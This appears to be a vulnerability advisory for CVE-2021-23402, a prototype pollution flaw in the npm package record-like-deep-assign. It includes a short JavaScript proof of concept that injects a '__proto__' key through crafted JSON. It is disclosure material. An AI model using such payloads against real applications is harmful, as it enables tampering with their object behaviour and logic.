GHSA-7qm6-9v49-38m9
Suggest an improvement- Source
- https://github.com/advisories/GHSA-7qm6-9v49-38m9
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/12/GHSA-7qm6-9v49-38m9/GHSA-7qm6-9v49-38m9.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-7qm6-9v49-38m9
- Aliases
-
- CVE-2021-23402
- Published
- 2021-12-10T18:55:39Z
- Modified
- 2023-11-08T04:05:07.572428Z
- Severity
-
- 7.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L CVSS Calculator
- Summary
- Prototype Pollution in record-like-deep-assign
- Details
-
All versions of package record-like-deep-assign are vulnerable to Prototype Pollution via the main functionality.
PoC
const deepAssign = require('record-like-deep-assign'); let obj = {}; console.log("Before being polluted: " + obj.polluted); EVIL_JSON = JSON.parse('{"__proto__":{"polluted":true}}'); deepAssign({}, EVIL_JSON); console.log("After being polluted: " + obj.polluted); - Database specific
{ "nvd_published_at": "2021-07-02T16:15:00Z", "github_reviewed_at": "2021-07-06T14:32:33Z", "github_reviewed": true, "severity": "HIGH", "cwe_ids": [ "CWE-1321", "CWE-915" ] }- References
Affected packages
npm / record-like-deep-assign
Package
- Name
- record-like-deep-assign
- View open source insights on deps.dev
- Purl
- pkg:npm/record-like-deep-assign